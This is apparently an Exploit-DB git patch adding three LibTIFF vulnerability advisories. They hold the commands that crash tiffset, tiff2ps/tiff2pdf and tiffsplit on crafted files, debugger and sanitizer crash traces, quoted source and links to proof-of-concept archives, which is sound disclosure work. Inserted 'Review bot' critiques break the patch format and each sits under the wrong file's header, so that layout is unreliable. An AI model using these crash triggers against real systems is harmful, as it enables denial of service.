From d3536f6bef47a6ba442a19752dedcf09a441f82f Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 7 Jul 2017 05:01:20 +0000
Subject: [PATCH] DB: 2017-07-07
3 new exploits
LibTIFF - 'tif_dirwrite.c' Denial of Service
LibTIFF - 'tif_jbig.c' Denial of Service
LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read
---
 files.csv | 3 ++
 platforms/linux/dos/42299.txt | 87 +++++++++++++++++++++++++++++++++
 platforms/linux/dos/42300.txt | 42 ++++++++++++++++
 platforms/linux/dos/42301.txt | 91 +++++++++++++++++++++++++++++++++++
 4 files changed, 223 insertions(+)
 create mode 100755 platforms/linux/dos/42299.txt
 create mode 100755 platforms/linux/dos/42300.txt
 create mode 100755 platforms/linux/dos/42301.txt
diff --git a/files.csv b/files.csv
index 5898d9e89..4ec8ee70d 100644
--- a/files.csv
+++ b/files.csv
@@ -5605,6 +5605,9 @@ id,file,description,date,author,platform,type,port
 42279,platforms/freebsd_x86/dos/42279.c,"FreeBSD - 'setrlimit' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
 42285,platforms/android/dos/42285.txt,"LG MRA58K - 'ASFParser::SetMetaData' Stack Overflow",2017-06-30,"Google Security Research",android,dos,0
 42286,platforms/multiple/dos/42286.txt,"Google Chrome - Out-of-Bounds Access in RegExp Stubs",2017-06-30,"Google Security Research",multiple,dos,0
+42299,platforms/linux/dos/42299.txt,"LibTIFF - 'tif_dirwrite.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0
+42300,platforms/linux/dos/42300.txt,"LibTIFF - 'tif_jbig.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0
+42301,platforms/linux/dos/42301.txt,"LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read",2017-07-06,zhangtan,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
diff --git a/platforms/linux/dos/42299.txt b/platforms/linux/dos/42299.txt
new file mode 100755
index 000000000..64a7f13d4
--- /dev/null
+++ b/platforms/linux/dos/42299.txt
@@ -0,0 +1,87 @@
+Source: http://bugzilla.maptools.org/show_bug.cgi?id=2712
+
+Triggered by "./tiffset POC1"
+
+$ ./tiffset POC1
+TIFFReadDirectory: Warning, Unknown field with tag 302 (0x12e) encountered.
+TIFFReadDirectory: Warning, Unknown field with tag 61961 (0xf209) encountered.
+poc3: AdobeDeflate compression support is not configured.
+tiffset: tif_dirwrite.c:2127: int TIFFWriteDirectoryTagCheckedLong8Array(TIFF
+*, uint32 *, TIFFDirEntry *, uint16, uint32, uint64 *): Assertion
+`tif->tif_flags&TIFF_BIGTIFF' failed.
+Aborted
+
+The gdb debugging information is listed below:
+(gdb) set args POC1
+(gdb) r
+...
+(gdb) c
+Continuing.
+TIFFReadDirectory: Warning, Unknown field with tag 302 (0x12e) encountered.
+TIFFReadDirectory: Warning, Unknown field with tag 61961 (0xf209) encountered.
+poc2: AdobeDeflate compression support is not configured.
+
+Breakpoint 2, TIFFWriteDirectoryTagCheckedLong8Array (tif=,
+ndir=, count=1,
+ value=0x615c20, dir=, tag=) at
+tif_dirwrite.c:2127
+2127 assert(tif->tif_flags&TIFF_BIGTIFF);
+(gdb) bt
+#0 0x00007ffff746a428 in __GI_raise (sig=sig@entry=6) at
+../sysdeps/unix/sysv/linux/raise.c:54
+#1 0x00007ffff746c02a in __GI_abort () at abort.c:89
+#2 0x00007ffff7462bd7 in __assert_fail_base (fmt=,
+ assertion=assertion@entry=0x7ffff7baf949 "tif->tif_flags&TIFF_BIGTIFF",
+ file=file@entry=0x7ffff7baf5c0 "tif_dirwrite.c", line=line@entry=2127,
+ function=function@entry=0x7ffff7baf8e2 "int
+TIFFWriteDirectoryTagCheckedLong8Array(TIFF *, uint32 *, TIFFDirEntry *,
+uint16, uint32, uint64 *)") at assert.c:92
+#3 0x00007ffff7462c82 in __GI___assert_fail (assertion=0x7ffff7baf949
+"tif->tif_flags&TIFF_BIGTIFF",
+ file=0x7ffff7baf5c0 "tif_dirwrite.c", line=2127,
+ function=0x7ffff7baf8e2 "int TIFFWriteDirectoryTagCheckedLong8Array(TIFF *,
+uint32 *, TIFFDirEntry *, uint16, uint32, uint64 *)") at assert.c:101
+#4 0x00007ffff7b4e9cb in TIFFWriteDirectoryTagCheckedLong8Array (tif=0x615010,
+ndir=, count=1,
+ value=0x615c20, dir=, tag=) at
+tif_dirwrite.c:2127
+#5 TIFFWriteDirectoryTagLong8Array (count=1, value=0x615c20, tif=, ndir=,
+ dir=, tag=) at tif_dirwrite.c:1462
+#6 TIFFWriteDirectorySec (tif=, isimage=,
+imagedone=,
+ pdiroff=) at tif_dirwrite.c:746
+#7 0x00007ffff7b4f6b5 in TIFFWriteDirectory (tif=0x615010) at
+tif_dirwrite.c:184
+#8 TIFFRewriteDirectory (tif=) at tif_dirwrite.c:360
+#9 0x0000000000402bc7 in main (argc=, argv=) at
+tiffset.c:344
+
+Trigged in line tif_dirwrite.c:2127 at function
+TIFFWriteDirectoryTagCheckedLong8Array()
+2122 static int
+2123 TIFFWriteDirectoryTagCheckedLong8Array(TIFF* tif, uint32* ndir,
+TIFFDirEntry* dir, uint16 tag, uint32 count, uint64* value)
+2124 {
+2125 assert(count<0x20000000);
+2126 assert(sizeof(uint64)==8);
+2127 assert(tif->tif_flags&TIFF_BIGTIFF);
+2128 if (tif->tif_flags&TIFF_SWAB)
+2129 TIFFSwabArrayOfLong8(value,count);
+2130
+return(TIFFWriteDirectoryTagData(tif,ndir,dir,tag,TIFF_LONG8,count,count*8,value));
+2131 }
+
+[note]: Tiffset sets the value of a TIFF header to a specified value.It will
+modify the raw POC file,so you'd better make a backup file every time you are
+going to run.
+
+Credits:
+
+This vulnerability is detected by team OWL337, with our custom fuzzer collAFL.
+Please contact ganshuitao@gmail.com and chaoz@tsinghua.edu.cn if you need
+more info about the team, the tool or the vulnerability.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42299.zip
diff --git a/platforms/linux/dos/42300.txt b/platforms/linux/dos/42300.txt
new file mode 100755
index 000000000..fb008abed
--- /dev/null
+++ b/platforms/linux/dos/42300.txt
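Review bot: The advisory never states which LibTIFF version was tested, unlike the sibling 42300.txt ("Affected version") and 42301.txt ("On 4.0.7:"), so a reader cannot tell whether the abort at tif_dirwrite.c:2127 still applies to a current release; an "Affected version:" line next to the "Triggered by" line would fix that. The pasted transcripts are also inconsistent with the stated command: the run is "./tiffset POC1" but the library messages name "poc3:" and "poc2:", which suggests the shell output and the gdb session came from different input files and should be labelled as such. The quoted source shows the failure is the TIFF_BIGTIFF assertion when a LONG8 directory entry is written to a classic TIFF, so the impact is an assertion abort of the tiffset tool rather than memory corruption; stating that explicitly would make the "Denial of Service" classification in the files.csv entry easier to verify.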
@@ -0,0 +1,42 @@
+Source: http://bugzilla.maptools.org/show_bug.cgi?id=2706
+
+Triggered by “./tiff2ps $POC” or “./tiff2pdf $POC”
+
+Triggered by “./tiff2ps $POC” or “./tiff2pdf $POC”
+
+The asan debug information is below:
+
+$./tiff2ps $POC
+
+
+=================================================================
+==26627==ERROR: LeakSanitizer: detected memory leaks
+
+Direct leak of 1792 byte(s) in 7 object(s) allocated from:
+ #0 0x7f7c4f1a19aa in malloc
+(/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989aa)
+ #1 0x7f7c4dca72fd (/usr/lib/x86_64-linux-gnu/libjbig.so.0+0x12fd)
+ #2 0x3ea ()
+
+Indirect leak of 170491316224 byte(s) in 223 object(s) allocated from:
+ #0 0x7f7c4f1a19aa in malloc
+(/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989aa)
+ #1 0x7f7c4dca72fd (/usr/lib/x86_64-linux-gnu/libjbig.so.0+0x12fd)
+ #2 0x3ea ()
+
+SUMMARY: AddressSanitizer: 170491318016 byte(s) leaked in 230 allocation(s).
+
+
+Affected version:
+<=the Latest version (4.0.8)
+
+
+Credits:
+
+This vulnerability is detected by team OWL337, with our custom fuzzer coll AFL.
+Please contact ganshuitao@gmail.com and chaoz@tsinghua.edu.cn if you need more
+info about the team, the tool or the vulnerability.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42300.zip
diff --git a/platforms/linux/dos/42301.txt b/platforms/linux/dos/42301.txt
new file mode 100755
index 000000000..1b7792913
--- /dev/null
+++ b/platforms/linux/dos/42301.txt
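Review bot: The only resolved frames in both LeakSanitizer reports are malloc inside libasan and an address inside libjbig.so.0 (frame #1, with frame #2 unresolved), so nothing in the pasted output actually places the leak in LibTIFF's tif_jbig.c, yet both the title and the files.csv entry attribute it there; the write-up should either show a symbolised stack that reaches tif_jbig.c or say that the allocations originate in the external libjbig library and that the LibTIFF attribution is inferred. The "Indirect leak of 170491316224 byte(s)" figure is far larger than any plausible allocation for a single image conversion and deserves an explicit caveat rather than being presented without comment, since a reader will otherwise take it as the size of the attacker-controlled allocation. The "Triggered by" line is also duplicated and one copy should be dropped. "Affected version: <=the Latest version (4.0.8)" gives only an upper bound; naming the version that was actually run would help triage.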
@@ -0,0 +1,91 @@
+Source: http://bugzilla.maptools.org/show_bug.cgi?id=2693
+
+On 4.0.7:
+
+# tiffsplit $FILE
+
+==2007== Invalid read of size 4
+==2007== at 0x40CD1A: _TIFFVGetField (tif_dir.c:1072)
+==2007== by 0x41B2C5: TIFFVGetField (tif_dir.c:1198)
+==2007== by 0x41B2C5: TIFFGetField (tif_dir.c:1182)
+==2007== by 0x404CCF: tiffcp (tiffsplit.c:220)
+==2007== by 0x404CCF: main (tiffsplit.c:89)
+==2007== Address 0x0 is not stack'd, malloc'd or (recently) free'd
+
+------- Comment #1 From zhangtan 2017-05-15 01:20:26 -------
+
+The place of Out of bound read:
+
+ret_val = 0;
+for (i = 0; i < td->td_customValueCount; i++) {
+ TIFFTagValue *tv = td->td_customValues + i;
+
+if (tv->info->field_tag != tag)
+ continue;
+
+------- Comment #2 From zhangtan 2017-05-15 01:29:10 -------
+
+The place of Out of bound read:
+
+The 1072 line of tif_dir.c
+
+1068 ret_val = 0;
+1069 for (i = 0; i < td->td_customValueCount; i++) {
+1070 TIFFTagValue *tv = td->td_customValues + i;
+1071
+1072 if (tv->info->field_tag != tag)
+1073 continue;
+
+As tv increased in 1070, Out of bound read happened in 1072 when the pointer tv
+was referenced.
+
+------- Comment #3 From zhangtan 2017-05-15 01:46:33 -------
+
+PoC:
+
+Detailed information of the bug can be reproduced using the valgrind tool:
+
+# valgrind tiffsplit $File(the testcase in the attachment)
+
+Error Message:
+==23520== Invalid read of size 4
+==23520== at 0x40CD1A: _TIFFVGetField (tif_dir.c:1072)
+==23520== by 0x41B2C5: TIFFVGetField (tif_dir.c:1198)
+==23520== by 0x41B2C5: TIFFGetField (tif_dir.c:1182)
+==23520== by 0x404CCF: tiffcp (tiffsplit.c:220)
+==23520== by 0x404CCF: main (tiffsplit.c:89)
+==23520== Address 0x0 is not stack'd, malloc'd or (recently) free'd
+==23520==
+==23520==
+==23520== Process terminating with default action of signal 11 (SIGSEGV)
+==23520== Access not within mapped region at address 0x0
+==23520== at 0x40CD1A: _TIFFVGetField (tif_dir.c:1072)
+==23520== by 0x41B2C5: TIFFVGetField (tif_dir.c:1198)
+==23520== by 0x41B2C5: TIFFGetField (tif_dir.c:1182)
+==23520== by 0x404CCF: tiffcp (tiffsplit.c:220)
+==23520== by 0x404CCF: main (tiffsplit.c:89)
+==23520== If you believe this happened as a result of a stack
+==23520== overflow in your program's main thread (unlikely but
+==23520== possible), you can try to increase the size of the
+==23520== main thread stack using the --main-stacksize= flag.
+==23520== The main thread stack size used in this run was 8388608.
+==23520==
+==23520== HEAP SUMMARY:
+==23520== in use at exit: 17,821 bytes in 42 blocks
+==23520== total heap usage: 96 allocs, 54 frees, 59,223 bytes allocated
+==23520==
+==23520== LEAK SUMMARY:
+==23520== definitely lost: 0 bytes in 0 blocks
+==23520== indirectly lost: 0 bytes in 0 blocks
+==23520== possibly lost: 0 bytes in 0 blocks
+==23520== still reachable: 17,821 bytes in 42 blocks
+==23520== suppressed: 0 bytes in 0 blocks
+==23520== Rerun with --leak-check=full to see details of leaked memory
+==23520==
+==23520== For counts of detected and suppressed errors, rerun with: -v
+==23520== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
+Segmentation fault
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42301.zip
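Review bot: Both valgrind runs report "Address 0x0 is not stack'd, malloc'd or (recently) free'd" and "Access not within mapped region at address 0x0" for the read at tif_dir.c:1072, which is the signature of a NULL pointer being dereferenced (tv->info being NULL on that line) rather than tv running past the end of td_customValues as the Comment #2 explanation ("As tv increased in 1070, Out of bound read happened") asserts. The title, the "Out-of-Bounds Read" classification carried into the files.csv entry in this commit, and the "The place of Out of bound read" headings therefore overstate what the evidence shows; unless a run with a non-zero faulting address is added, the write-up should describe the bug as a NULL-pointer dereference / crash in _TIFFVGetField reached via TIFFGetField from tiffsplit. A one-line note of what the 0x0 address implies next to the first valgrind block would keep later readers from treating this as a memory-disclosure primitive.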